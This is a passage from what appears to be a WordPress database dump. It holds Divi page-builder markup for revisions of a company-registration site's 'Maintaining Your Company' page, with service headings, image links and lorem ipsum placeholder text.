custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-15 14:59:59','2019-08-15 12:59:59','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32805,3,'2019-08-15 14:55:41','2019-08-15 12:55:41','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Maintaining Your Company</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why should you maintain your company?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Annual Returns\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In CC Members\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Company  Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company Register\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In CC Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company and Closed Corporation Restoration\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" custom_margin=\"|auto|100px|auto||\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Director-cover-final.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Adress\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Company & Closed Corporation Restoration\" image=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.26.6\"][et_pb_column _builder_version=\"3.26.6\" type=\"4_4\"][et_pb_text _builder_version=\"3.26.6\" header_font_size=\"38px\" box_shadow_style=\"preset1\" border_radii=\"on|20px|20px|20px|20px\" custom_padding=\"10px||||false|false\"]<h1 style=\"text-align: center;\">Our Best Sellers</h1>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" 